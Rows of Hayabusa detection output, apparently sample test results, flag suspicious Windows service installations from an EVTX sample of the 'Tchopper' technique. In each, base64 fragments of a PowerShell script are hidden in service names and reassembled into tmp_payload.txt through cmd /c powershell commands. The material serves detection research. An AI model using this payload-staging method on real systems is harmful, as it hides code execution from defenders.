+2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
